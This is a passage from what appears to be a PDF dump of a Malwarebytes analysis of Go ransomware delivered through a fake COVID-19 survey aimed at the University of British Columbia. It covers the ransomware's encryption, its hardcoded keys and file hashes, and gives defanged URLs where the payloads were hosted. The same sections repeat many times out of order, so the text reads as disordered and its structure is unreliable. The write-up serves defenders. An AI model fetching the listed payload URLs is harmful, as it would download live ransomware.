Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3287 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3288 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3289 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3290 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3291 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3292 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3293 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3294 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3295 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3296 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3297 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3298 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3299 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3300 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3301 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3302 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3303 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3304 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3305 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3306 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3307 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3308 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3309 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3310 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3311 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3312 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3313 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3314 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3315 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3316 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3317 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3318 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular 